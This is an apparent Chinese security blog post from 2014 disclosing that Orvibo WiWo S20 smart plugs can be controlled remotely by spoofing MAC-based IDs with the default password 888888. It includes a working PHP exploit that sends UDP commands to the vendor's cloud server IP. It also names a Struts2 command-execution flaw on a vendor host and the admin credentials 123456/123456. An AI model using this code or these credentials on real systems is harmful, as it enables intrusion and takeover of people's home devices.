首页 > 安全 > 网络安全 >

智能家居可大规模远程控制别人家的设备

2014-11-07

我中意你家的外观设计,也非常佩服smart config的神奇设计,可是就差那么一点点啊。欧瑞博WiWo s20 智能插座协议分析:控制开关设备 uid = MAC + 0x202020202020MAC 地址扫描BSSID不同网段之间:攻击者

我中意你家的外观设计,也非常佩服smart config的神奇设计,
可是就差那么一点点啊。

欧瑞博WiWo s20 智能插座




协议分析:

控制开关

图片1.png









设备 uid = MAC + 0x202020202020

MAC 地址扫描BSSID





不同网段之间:

攻击者 (伪造UID+默认密码888888) -> 云端服务器

云端服务器 -> 攻击者(两个UDP回应包 )

攻击者 (UDP操作码) -> 云端服务器

云端服务器 ( UDP操作码) -> 控制设备





只需要知道其他人的mac地址 和密码(大部分是默认,不信看下面)就可以控制他人的设备

利用代码:



<?php

$fp = fsockopen(&#39;udp://42.121.111.208&#39;, 10000);

$send = pack(&#39;H*&#39;, &#39;xxxxxxxx36caccf23299bc4202020202020383838383838202020202020&#39;);

fwrite($fp, $send);

$recv = fread($fp, 8192);

$send = pack(&#39;H*&#39;, &#39;686400176463accf23299bc42020202020206b00000000&#39;);

$send[18] = $recv[18];

$send[22] = $recv[23] == chr(0) ? chr(1) : chr(0);

fwrite($fp, $send);

$recv = fread($fp, 8192);





结合云端漏洞 就变恐怖了。。。。。。。。。



http://vicenter.orvibo.com:20001/ struts2 命令执行啊



管理员弱口令啊 用户名也都是 123456 123456





所以

222222.png



还能远程debug...


222222.png







还没mac 地址呢

别急

3333333333333344444444444444444.png





我说都是弱口令吧

383838383838 hex 888888



可以本地发指令给云端 让云端 转发给设备

也可以直接云端发指令给设备。



当然还有 很多固件啊 你们的红外码 之类的都外漏了




666666666666666666666662.png

777777777777777777777777777777777.png

相关文章
最新文章
热点推荐